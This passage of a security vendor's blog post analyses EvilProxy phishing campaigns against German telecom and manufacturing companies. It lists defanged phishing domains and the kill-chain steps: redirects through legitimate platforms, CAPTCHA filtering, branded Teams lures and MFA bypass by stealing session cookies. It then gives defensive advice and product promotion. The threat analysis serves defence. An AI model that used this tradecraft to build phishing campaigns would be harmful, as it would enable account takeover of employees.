<figure class="wp-block-image size-large"><img loading="lazy" decoding="async" width="1024" height="486" src="https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/germany_12-1024x486.png" alt="" class="wp-image-19971" srcset="https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/germany_12-1024x486.png 1024w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/germany_12-300x142.png 300w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/germany_12-768x364.png 768w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/germany_12-1536x729.png 1536w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/germany_12-370x176.png 370w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/germany_12-270x128.png 270w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/germany_12-740x351.png 740w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/germany_12.png 1842w" sizes="(max-width: 1024px) 100vw, 1024px" /><figcaption class="wp-element-caption"><em>Phishing page abusing&nbsp;Microsoft&nbsp;services</em>&nbsp;</figcaption></figure>



<p><strong>Target</strong>&nbsp;<br>An employee of a German telecommunications company. Unlike the finance and healthcare cases, this campaign used a non-personalized phishing page (no email embedded in the URL) suggesting a broader campaign that may target multiple companies simultaneously rather than a single individual.&nbsp;</p>



<p><strong>Attack Type</strong>&nbsp;<br>Phishing via&nbsp;EvilProxy&nbsp;(Phishing-as-a-Service) — a commercial reverse proxy platform that proxies the real Microsoft login page in real time, intercepting session&nbsp;tokens&nbsp;and bypassing MFA without ever needing to steal a password.&nbsp;</p>



<p><strong>Kill Chain</strong>&nbsp;</p>



<ol start="1" class="wp-block-list">
<li>The victim receives a link pointing to portfolio-hrpcjqg[.]format.com/gallery — a legitimate portfolio hosting platform (Format.com). Using a reputable platform as the first hop bypasses domain reputation filters.</li>
</ol>



<figure class="wp-block-image size-full"><img loading="lazy" decoding="async" width="921" height="397" src="https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/germany_13.png" alt="" class="wp-image-19973" srcset="https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/germany_13.png 921w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/germany_13-300x129.png 300w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/germany_13-768x331.png 768w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/germany_13-370x159.png 370w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/germany_13-270x116.png 270w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/germany_13-740x319.png 740w" sizes="(max-width: 921px) 100vw, 921px" /><figcaption class="wp-element-caption"><em>Non-personalized phishing page on a legitimate website</em>&nbsp;</figcaption></figure>



<ol start="2" class="wp-block-list">
<li>Format.com redirects to&nbsp;signin[.]securedocsportal.com/cyb3rusr131 — a phishing domain crafted to resemble a secure document signing portal, a plausible context for a telecom business user.&nbsp;</li>
</ol>



<ol start="3" class="wp-block-list">
<li>Cloudflare Turnstile CAPTCHA filters automated scanners and security tools.&nbsp;</li>
</ol>



<ol start="4" class="wp-block-list">
<li>After passing CAPTCHA, the victim reaches a page mimicking Microsoft 365 OAuth authorization, complete with&nbsp;client_id&nbsp;and&nbsp;redirect_uri&nbsp;parameters pointing to office.com for added legitimacy.&nbsp;</li>
</ol>



<ol start="5" class="wp-block-list">
<li>EvilProxy&nbsp;proxies the real Microsoft Login through its own subdomains, giving the victim a fully functional Microsoft login experience.&nbsp;</li>
</ol>



<ol start="6" class="wp-block-list">
<li>The victim enters credentials and completes&nbsp;MFA.&nbsp;EvilProxy&nbsp;intercepts the session cookie in real time, granting the attacker full authenticated access to the victim’s Microsoft 365 account without needing the password or MFA token.&nbsp;</li>
</ol>



<p><strong>Why It Works</strong>&nbsp;<br>EvilProxy&nbsp;is commercially available as a service, dramatically lowering the skill threshold for attackers.&nbsp;The use of a legitimate portfolio platform as the initial URL makes detection by email gateways extremely difficult.&nbsp;The MFA bypass via session cookie theft is highly effective against organizations that believe MFA alone is&nbsp;sufficient&nbsp;protection.&nbsp;</p>



<h2 class="wp-block-heading">5. Manufacturing: Brand-Impersonation and Teams Lure&nbsp;</h2>



<p>Germany’s manufacturing sector:&nbsp;</p>



<ul class="wp-block-list">
<li>Is globally&nbsp;dominant;&nbsp;</li>
</ul>



<ul class="wp-block-list">
<li>Relies on internal communication&nbsp;platforms;&nbsp;</li>
</ul>



<ul class="wp-block-list">
<li>Often integrates IT and OT environments.&nbsp;</li>
</ul>



<p>Germany’s manufacturing sector is the engine of its economy, encompassing global leaders in chemicals, automotive, engineering, and consumer goods. They are also increasingly connected: Industry 4.0 technologies, IoT sensors, operational technology (OT), and cloud-integrated production systems have blurred the line between IT and physical operations.&nbsp;</p>



<p>The consequences of a successful attack extend beyond data loss to potential operational shutdown, physical equipment damage, and supply chain disruption.&nbsp;</p>



<p>Social engineering attacks targeting manufacturing employees are particularly effective because plant-floor and operations staff are not traditionally cybersecurity-trained, and Microsoft Teams has become a standard communication tool across these large organizations.&nbsp;</p>



<h3 class="wp-block-heading">Threat in Focus:&nbsp;Teams Voice Message Phishing&nbsp;</h3>



<figure class="wp-block-image size-large"><img loading="lazy" decoding="async" width="1024" height="484" src="https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/germany_15-1024x484.png" alt="" class="wp-image-19977" srcset="https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/germany_15-1024x484.png 1024w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/germany_15-300x142.png 300w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/germany_15-768x363.png 768w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/germany_15-1536x726.png 1536w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/germany_15-370x175.png 370w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/germany_15-270x128.png 270w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/germany_15-740x350.png 740w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/germany_15.png 1850w" sizes="(max-width: 1024px) 100vw, 1024px" /><figcaption class="wp-element-caption"><em>Fake Microsoft Teams phishing attack</em></figcaption></figure>



<p><strong>Target</strong>&nbsp;<br>A large German industrial conglomerate, a global producer of chemical products and consumer goods. This attack was unusually specific: the phishing domains were registered to include the target&nbsp;company’s&nbsp;name, and the fake login page was styled to match the company’s Microsoft Teams branding —&nbsp;indicating&nbsp;advance reconnaissance.&nbsp;</p>



<p><strong>Attack Type</strong>&nbsp;<br>Phishing via&nbsp;EvilProxy&nbsp;using a Microsoft Teams voice message as&nbsp;bait. The attack was delivered via Amazon SES, a legitimate email delivery infrastructure, making it difficult for email security tools to flag based on sender reputation.&nbsp;</p>



<p><strong>Kill Chain</strong>&nbsp;</p>



<ol start="1" class="wp-block-list">
<li>The victim receives an email sent through Amazon SES,&nbsp;notifying them&nbsp;of a missed voice message in Microsoft Teams — a common notification that workers in large organizations receive regularly</li>
</ol>



<figure class="wp-block-image size-large"><img loading="lazy" decoding="async" width="1024" height="395" src="https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/germany_14-1-1024x395.png" alt="" class="wp-image-19978" srcset="https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/germany_14-1-1024x395.png 1024w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/germany_14-1-300x116.png 300w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/germany_14-1-768x296.png 768w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/germany_14-1-370x143.png 370w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/germany_14-1-270x104.png 270w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/germany_14-1-740x285.png 740w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/germany_14-1.png 1102w" sizes="(max-width: 1024px) 100vw, 1024px" /><figcaption class="wp-element-caption"><em>Fake email voice message notification</em></figcaption></figure>



<ol start="2" class="wp-block-list">
<li>The link leads to&nbsp;voicbx[.]com, a redirect service mimicking a Teams voice notification interface.&nbsp;</li>
</ol>



<ol start="3" class="wp-block-list">
<li>Redirects&nbsp;to&nbsp;noncrappyandroidapps[.]com for an anti-bot verification step.&nbsp;</li>
</ol>



<ol start="4" class="wp-block-list">
<li>TinyURL&nbsp;then routes the victim to teams-ms365[.]cloud, a phishing domain mimicking Microsoft Teams infrastructure.&nbsp;</li>
</ol>



<ol start="5" class="wp-block-list">
<li>The victim lands on a fake Teams voice message page, styled specifically to match the target company’s branding — a degree of customization that&nbsp;indicates&nbsp;prior research into the target.&nbsp;</li>
</ol>



<ol start="6" class="wp-block-list">
<li>When the victim&nbsp;attempts&nbsp;to play the voice message, they are redirected to&nbsp;EvilProxy&nbsp;domains that also&nbsp;contain&nbsp;the company’s name in the URL.&nbsp;</li>
</ol>



<ol start="7" class="wp-block-list">
<li>The victim enters their credentials into a fake Okta authentication page and completes&nbsp;MFA.&nbsp;EvilProxy&nbsp;intercepts the session cookie, granting the attacker full access to the corporate Microsoft 365 environment without requiring the password or MFA factor.&nbsp;</li>
</ol>



<p><strong>Why It Works</strong>&nbsp;<br>The combination of a highly plausible lure (missed Teams voice message), delivery via Amazon SES (bypassing sender reputation filters), and company-branded phishing pages makes this attack unusually convincing. The use of Okta for the fake authentication page&nbsp;suggests&nbsp;the attackers were aware of the target company’s specific identity infrastructure.&nbsp;</p>



<h2 class="wp-block-heading">Food for Thought: What CISOs Need to Be Aware Of&nbsp;</h2>



<h3 class="wp-block-heading">1. Five Critical German Industries Are Under Active Attack Right Now&nbsp;</h3>



<p>All five cases have been collected between January and March 2026. Finance, healthcare, IT, telecommunications, and manufacturing,&nbsp;the five most economically significant sectors in Germany,&nbsp;are not theoretical targets. They are active targets. This is systematic pressure on the German economy, not isolated incidents.&nbsp;<br>&nbsp;<br>ANY.RUN’s Threat Intelligence Lookup data reinforces this: searching for&nbsp;EvilProxy&nbsp;and&nbsp;FlowerStorm&nbsp;threats linked to German organizations over the past 60 days returned more than 220&nbsp;analyses, confirming that these campaigns are ongoing and widespread.&nbsp;</p>



<p><a href="https://intelligence.any.run/analysis/lookup?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=german-industries-attack-cases&amp;utm_term=090426&amp;utm_content=linktotilookup#%7B%2522query%2522:%2522(threatName:%255C%2522flowerstorm%255C%2522%2520OR%2520threatName:%255C%2522evilproxy%255C%2522)%2520and%2520submissionCountry:%255C%2522DE%255C%2522%2522,%2522dateRange%2522:60%7D" target="_blank" rel="noreferrer noopener">(threatName:&#8221;flowerstorm&#8221; OR threatName:&#8221;evilproxy&#8221;) and submissionCountry:&#8221;DE&#8221;</a></p>



<figure class="wp-block-image size-full"><img loading="lazy" decoding="async" width="849" height="175" src="https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/germany_16.png" alt="" class="wp-image-19981" srcset="https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/germany_16.png 849w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/germany_16-300x62.png 300w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/germany_16-768x158.png 768w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/germany_16-370x76.png 370w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/germany_16-270x56.png 270w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/germany_16-740x153.png 740w" sizes="(max-width: 849px) 100vw, 849px" /><figcaption class="wp-element-caption"><em>Industries targeted by modern phishing campaigns in Germany</em>&nbsp;</figcaption></figure>



<h3 class="wp-block-heading">2.&nbsp;Selective Targeting Is a Growing Trend&nbsp;</h3>



<p>Several of these attacks show&nbsp;clear signs&nbsp;of advance reconnaissance. Phishing domains were registered with the target&nbsp;company’s&nbsp;name embedded, pages were styled to match corporate branding, and victim email addresses were pre-loaded into URLs. This level of preparation (particularly in the manufacturing case) goes beyond generic mass phishing and suggests attackers are investing in targeted intelligence gathering before launching campaigns. Some cases also used universal phishing pages,&nbsp;indicating&nbsp;a mix of targeted and mass-scale approaches within the same&nbsp;threat&nbsp;actor ecosystem.&nbsp;</p>



<h3 class="wp-block-heading">3.&nbsp;Social Engineering Is Being Adapted to Professional Context&nbsp;</h3>



<p>The lures used in these attacks are not generic. A salary-themed document for a finance employee, a missed Teams voice message for a manufacturing executive, a “Review document” prompt for an IT professional. Attackers&nbsp;appear to be&nbsp;selecting bait that fits the professional context of their targets, increasing click rates and reducing suspicion. This contextual adaptation of social engineering is a significant evolution in phishing tradecraft.&nbsp;</p>



<h3 class="wp-block-heading">4. Phishing-as-a-Service Platforms Have Democratized MFA Bypass&nbsp;</h3>



<p>EvilProxy, EvilGinx2, and&nbsp;FlowerStorm&nbsp;are not bespoke tools used by elite threat actors. They are commercially&nbsp;available&nbsp;phishing platforms sold as services. This means the barrier to launching a sophisticated, MFA-bypassing attack against a German enterprise is now accessible to a broad range of cybercriminals. These platforms proxy real Microsoft login pages in real time, intercept session cookies after successful MFA completion, and provide the attacker with a fully authenticated session — all without ever knowing the&nbsp;victim’s&nbsp;password or one-time code.&nbsp;</p>



<p>Organizations that rely on MFA as their primary defense against credential theft need to understand that adversary-in-the-middle phishing&nbsp;renders&nbsp;standard MFA ineffective. Phishing-resistant MFA (such as FIDO2 hardware keys) and Zero Trust session validation are&nbsp;required&nbsp;to defend against these techniques.&nbsp;</p>



<h2 class="wp-block-heading">Protecting High-Risk Organizations: A Practical Approach for Decision-Makers&nbsp;</h2>



<p>For executives across finance, healthcare, telecom, IT, and manufacturing, cybersecurity is no longer just a technical function. It is a&nbsp;<strong>business continuity and risk management discipline</strong>.&nbsp;</p>



<p>The attacks described in this article share a common trait:&nbsp;they&nbsp;move fast, abuse trusted services, and bypass traditional defenses.&nbsp;</p>



<p>To counter this, organizations need more than tools. They need a workflow-driven approach, where threat intelligence and malware analysis directly improve how the SOC&nbsp;operates.&nbsp;</p>



<p>Here&nbsp;is&nbsp;how this translates into measurable protection across core SOC workflows.&nbsp;</p>



<h3 class="wp-block-heading">1. Monitoring: Detect Earlier, Reduce Exposure&nbsp;</h3>



<p><strong>The&nbsp;Challenge:</strong>&nbsp;<br>Detection gaps, delayed visibility into new campaigns, and high volumes of low-context alerts.&nbsp;</p>



<p><strong>What to&nbsp;do:</strong>&nbsp;</p>



<ul class="wp-block-list">
<li><a href="https://any.run/integrations/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=german-industries-attack-cases&amp;utm_term=090426&amp;utm_content=linktointegrations" target="_blank" rel="noreferrer noopener">Integrate TI Feeds</a>&nbsp;into SIEM, EDR, and email gateways&nbsp;</li>
</ul>



<ul class="wp-block-list">
<li>Leverage sandbox-verified indicators tied to real attack activity&nbsp;</li>
</ul>



<ul class="wp-block-list">
<li>Continuously&nbsp;monitor&nbsp;infrastructure linked to phishing and session hijacking campaigns&nbsp;</li>
</ul>



<p>Instead of waiting for alerts, your SOC gains early visibility into attacker infrastructure, often within hours of campaign emergence&nbsp;</p>



<p><strong>Business impact:</strong>&nbsp;</p>



<ul class="wp-block-list">
<li>Higher detection rates across environments&nbsp;(36% DR increase);&nbsp;</li>
</ul>



<ul class="wp-block-list">
<li>Earlier identification of threats before user&nbsp;interaction;&nbsp;</li>
</ul>



<ul class="wp-block-list">
<li>Reduced likelihood of successful&nbsp;initial&nbsp;compromise.&nbsp;</li>
</ul>



<p><strong>Executive outcome:&nbsp;</strong>lower probability of high-severity incidents and reduced exposure window.&nbsp;</p>



<h3 class="wp-block-heading">2. Triage: Increase Speed, Reduce Cost per Incident&nbsp;</h3>



<p><strong>The&nbsp;Challenge:</strong>&nbsp;<br>Slow investigations, manual enrichment, and excessive escalation to senior analysts.&nbsp;</p>



<p><strong>What to&nbsp;do:</strong>&nbsp;</p>



<ul class="wp-block-list">
<li><a href="https://intelligence.any.run/analysis/lookup?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=german-industries-attack-cases&amp;utm_term=090426&amp;utm_content=linktolookup" target="_blank" rel="noreferrer noopener">Use TI Lookup</a>&nbsp;to instantly enrich indicators with behavioral and campaign&nbsp;context;&nbsp;</li>
</ul>



<ul class="wp-block-list">
<li>Combine enrichment with interactive sandbox analysis for rapid&nbsp;validation;&nbsp;</li>
</ul>



<ul class="wp-block-list">
<li>Enable Tier 1 analysts to resolve more alerts independently.&nbsp;</li>
</ul>



<p>Analysts move from fragmented investigation to instant, evidence-based decisions, with average detection times measured in seconds.&nbsp;</p>



<p><strong>Business impact:</strong>&nbsp;</p>



<ul class="wp-block-list">
<li>Faster MTTD and&nbsp;MTTR;&nbsp;</li>
</ul>



<ul class="wp-block-list">
<li>Up to 30% fewer escalations to higher&nbsp;tiers;&nbsp;</li>
</ul>



<ul class="wp-block-list">
<li>Reduced cost per investigation.&nbsp;</li>
</ul>



<p><strong>Executive outcome:</strong>&nbsp;more efficient SOC operations with lower staffing pressure and faster decision cycles.&nbsp;</p>



<h3 class="wp-block-heading">3. Incident Response:&nbsp;Contain&nbsp;Faster, Minimize Damage&nbsp;</h3>



<p><strong>The&nbsp;Challenge:</strong>&nbsp;<br>Limited visibility into attack scope and delayed containment decisions.&nbsp;</p>



<p><strong>What to&nbsp;do:</strong>&nbsp;</p>



<ul class="wp-block-list">
<li>Use&nbsp;<a href="https://any.run/features/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=german-industries-attack-cases&amp;utm_term=090426&amp;utm_content=linktosandboxlanding" target="_blank" rel="noreferrer noopener">Interactive Sandbox</a>&nbsp;to analyze full attack chains (redirects, payloads, exfiltration);&nbsp;</li>
</ul>



<ul class="wp-block-list">
<li>Correlate findings with TI Lookup to understand spread and related&nbsp;infrastructure;&nbsp;</li>
</ul>



<ul class="wp-block-list">
<li>Generate detailed reports for response and compliance.&nbsp;</li>
</ul>



<p>Incidents are no longer black boxes. Teams gain full kill-chain visibility within seconds and reduce response time significantly&nbsp;</p>



<p><strong>Business impact:</strong>&nbsp;</p>



<ul class="wp-block-list">
<li>Faster containment and remediation&nbsp;(90% of threats visible in 60 seconds);&nbsp;</li>
</ul>



<ul class="wp-block-list">
<li>Reduced operational&nbsp;disruption;&nbsp;</li>
</ul>



<ul class="wp-block-list">
<li>Lower likelihood of repeat incidents.&nbsp;</li>
</ul>



<p><strong>Executive outcome:</strong>&nbsp;minimized financial and operational&nbsp;impact&nbsp;from active threats.&nbsp;</p>



<h3 class="wp-block-heading">4. Threat Hunting: Shift from Reactive to Proactive Security&nbsp;</h3>



<p><strong>The&nbsp;Challenge:</strong>&nbsp;<br>Outdated data, manual validation, and lack of prioritization based on business risk.&nbsp;</p>



<p><strong>What to&nbsp;do:</strong>&nbsp;</p>



<ul class="wp-block-list">
<li>Use TI Feeds to track emerging threats targeting your industry and&nbsp;region;&nbsp;</li>
</ul>



<ul class="wp-block-list">
<li>Pivot with TI Lookup across related indicators and&nbsp;campaigns;&nbsp;</li>
</ul>



<ul class="wp-block-list">
<li>Use sandbox insights to refine detection logic and hunt hypotheses.&nbsp;</li>
</ul>



<p>Threat hunting becomes data-driven and context-aware,&nbsp;leveraging&nbsp;live attack activity across thousands of organizations.&nbsp;</p>



<p><strong>Business impact:</strong>&nbsp;</p>



<ul class="wp-block-list">
<li>Detection of threats before alerts&nbsp;trigger;&nbsp;</li>
</ul>



<ul class="wp-block-list">
<li>Reduced attacker dwell&nbsp;time;&nbsp;</li>
</ul>



<ul class="wp-block-list">
<li>More precise prioritization of high-risk threats.&nbsp;</li>
</ul>



<p><strong>Executive outcome</strong>:&nbsp;improved risk visibility and proactive defense posture.&nbsp;</p>



<h3 class="wp-block-heading">Operational Impact → Business Outcomes&nbsp;</h3>



<p>When these capabilities are aligned across workflows, the effect compounds:&nbsp;</p>



<p><strong>Operational gains:</strong>&nbsp;</p>



<ul class="wp-block-list">
<li>Faster case processing (minutes saved per investigation);&nbsp;</li>
</ul>



<ul class="wp-block-list">
<li>Higher detection rates (up to +36%);&nbsp;</li>
</ul>



<ul class="wp-block-list">
<li>Fewer escalations and analyst&nbsp;overload;&nbsp;</li>
</ul>



<ul class="wp-block-list">
<li>Shorter incident lifecycle.&nbsp;</li>
</ul>



<p><strong>Business outcomes:</strong>&nbsp;</p>



<ul class="wp-block-list">
<li>Reduced risk of breaches and account&nbsp;takeover;&nbsp;</li>
</ul>



<ul class="wp-block-list">
<li>Lower cost of security&nbsp;operations;&nbsp;</li>
</ul>



<ul class="wp-block-list">
<li>Minimized downtime and service&nbsp;disruption;&nbsp;</li>
</ul>



<ul class="wp-block-list">
<li>Stronger compliance and audit&nbsp;readiness;&nbsp;&nbsp;</li>
</ul>



<p>The difference between a resilient organization and a vulnerable one is not whether attacks happen.&nbsp;It is whether your teams can&nbsp;see threats early,&nbsp;understand them instantly,&nbsp;and act before impact spreads.&nbsp;</p>



<p>By combining TI Feeds (visibility), TI Lookup (context), and Interactive Sandbox (depth), you turn security operations into a measurable business advantage, not just a defensive necessity.&nbsp;</p>



<!-- Regular Banner START -->
<div class="regular-banner">
<!-- Text Content -->
<p class="regular-banner__text">
<span class="highlight">Accelerate investigations and stop threats earlier.  </span><br>
Leverage sandbox visibility and TI to improve SOC performance.</span>
&nbsp;   
</p>
<!-- CTA Link -->
<a class="regular-banner__link" id="article-banner-regular" href="https://app.any.run/?utm_source=anyrunblog&#038;utm_medium=article&#038;utm_campaign=german-industries-attack-cases&#038;utm_term=090426&#038;utm_content=linktotilookup#register?redirect-ref=intelligence.any.run/analysis/lookup" rel="noopener" target="_blank">
Register now
</a>
</div>
<!-- Regular Banner END -->
<!-- Regular Banner Styles START -->

<style>
.regular-banner {
display: flex;
text-align: center;
flex-direction: column;
align-items: center;
gap: 1.5rem;
width: 100%;
padding: 2rem;
margin: 1.5rem 0;
border-radius: 0.5rem;
font-family: 'Catamaran Bold';
margin-inline: auto;
background: rgba(32, 168, 241, 0.1);
border: 1px solid rgba(75, 174, 227, 0.32);
}

.regular-banner__text {
font-size: 1.5rem;
margin: 0;
}

.highlight {
color: #ea2526;
}

.regular-banner__link {
padding: 0.5rem 1.5rem;
font-weight: 500;
text-decoration: none;
border-radius: 0.5rem;
color: #FFFFFF;
background-color: #1491D4;
text-align: center;
transition: all 0.2s ease-in;
}

.regular-banner__link:hover {
background-color: #68CBFF;
color: white;
}
</style>
<!-- Regular Banner Styles END -->



<h2 class="wp-block-heading">Conclusion&nbsp;</h2>



<p>The five attacks documented in this report share a common thread: they are sophisticated, targeted, and actively exploiting the trust that German employees place in familiar platforms like Microsoft 365, Outlook, and Teams. They&nbsp;represent&nbsp;a new generation of phishing campaigns that have moved far beyond bulk spam — into precision-engineered operations that research their targets, customize their lures, and deploy infrastructure specifically designed to survive detection.&nbsp;</p>



<p>The good news is that these attacks are detectable. ANY.RUN’s Interactive Sandbox can analyze suspicious URLs and files in real time, tracing every redirect, every script, every&nbsp;network connection in the attack chain. The Threat Intelligence Lookup provides historical context — showing how many organizations have seen the same indicators, which industries are most targeted, and what threat families are most active.&nbsp;</p>



<p>In an economy where a single successful breach can cost billions and disrupt national supply chains, visibility and speed of response will define resilience.&nbsp;</p>



<h2 class="wp-block-heading">About ANY.RUN&nbsp;&nbsp;</h2>



<p><a href="https://any.run/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=german-industries-attack-cases&amp;utm_term=090426&amp;utm_content=linktolanding" target="_blank" rel="noreferrer noopener">ANY.RUN</a>, a leading provider of interactive malware analysis and threat intelligence solutions, helps security teams investigate threats faster and with greater clarity across modern enterprise environments.&nbsp;&nbsp;</p>



<p>It allows teams to safely execute suspicious files and URLs,&nbsp;observe&nbsp;real behavior in an&nbsp;<a href="https://any.run/features/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=german-industries-attack-cases&amp;utm_term=090426&amp;utm_content=linktosandboxlanding" target="_blank" rel="noreferrer noopener">Interactive Sandbox</a>, enrich&nbsp;indicators&nbsp;with immediate context through&nbsp;<a href="https://any.run/threat-intelligence-lookup/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=german-industries-attack-cases&amp;utm_term=090426&amp;utm_content=linktotilookuplanding" target="_blank" rel="noreferrer noopener">TI Lookup</a>, and&nbsp;monitor&nbsp;emerging malicious infrastructure using&nbsp;<a href="https://any.run/threat-intelligence-feeds/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=german-industries-attack-cases&amp;utm_term=090426&amp;utm_content=linktotifeedslanding" target="_blank" rel="noreferrer noopener">Threat Intelligence Feeds</a>. Together, these capabilities help reduce investigation uncertainty, accelerate triage, and limit unnecessary escalations across the SOC.&nbsp;&nbsp;</p>



<p>ANY.RUN is trusted by thousands of organizations worldwide and meets enterprise security and compliance expectations. It is&nbsp;<a href="https://any.run/compliance/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=german-industries-attack-cases&amp;utm_term=090426&amp;utm_content=linktocompliance" target="_blank" rel="noreferrer noopener">SOC 2 Type II certified</a>,&nbsp;demonstrating&nbsp;its commitment to protecting customer data and&nbsp;maintaining&nbsp;strong security controls.&nbsp;</p>



<h2 class="wp-block-heading">FAQ</h2>



<div class="schema-faq wp-block-yoast-faq-block"><div class="schema-faq-section" id="faq-question-1775735275297"><strong class="schema-faq-question">Why are German companies increasingly targeted by cybercriminals?</strong> <p class="schema-faq-answer">Germany’s strong economy, high digitalization, and reliance on cloud services make its organizations high-value targets with scalable attack surfaces.</p> </div> <div class="schema-faq-section" id="faq-question-1775735302165"><strong class="schema-faq-question">What industries are most at risk?</strong> <p class="schema-faq-answer">Finance, healthcare, IT, telecom, and manufacturing show consistently high risk due to data sensitivity, operational complexity, and business impact.</p> </div> <div class="schema-faq-section" id="faq-question-1775735317014"><strong class="schema-faq-question">What makes modern phishing attacks more dangerous?</strong> <p class="schema-faq-answer">They now use reverse proxy tools and OAuth abuse to capture authenticated sessions, allowing attackers to bypass MFA and access accounts in real time.</p> </div> <div class="schema-faq-section" id="faq-question-1775735334058"><strong class="schema-faq-question">What is session hijacking and why does it matter?</strong> <p class="schema-faq-answer">Session hijacking allows attackers to steal active login sessions instead of credentials, granting immediate access without needing passwords again.</p> </div> <div class="schema-faq-section" id="faq-question-1775735346467"><strong class="schema-faq-question">How does threat intelligence help prevent attacks?</strong> <p class="schema-faq-answer">It provides context, detection speed, and visibility into attacker infrastructure, enabling faster decisions and proactive defense.</p> </div> <div class="schema-faq-section" id="faq-question-1775735363861"><strong class="schema-faq-question">What is the difference between TI Lookup and TI Feeds?</strong> <p class="schema-faq-answer">TI Lookup is used for investigating specific indicators in real time, while TI Feeds provide continuous streams of threat data for proactive blocking.</p> </div> <div class="schema-faq-section" id="faq-question-1775735385013"><strong class="schema-faq-question">Can these attacks be stopped before impact?</strong> <p class="schema-faq-answer">Yes, with the right combination of threat intelligence, sandboxing, and fast-response workflows, organizations can detect and contain threats early.</p> </div> </div>
<p>The post <a rel="nofollow" href="https://any.run/cybersecurity-blog/german-industries-attack-cases/">How Phishing Is Targeting Germany’s Economy: Active Threats from Finance to Manufacturing</a> appeared first on <a rel="nofollow" href="https://any.run/cybersecurity-blog">ANY.RUN&#039;s Cybersecurity Blog</a>.</p>
]]></content:encoded>
					
					<wfw:commentRss>https://any.run/cybersecurity-blog/german-industries-attack-cases/feed/</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
	</channel>
</rss>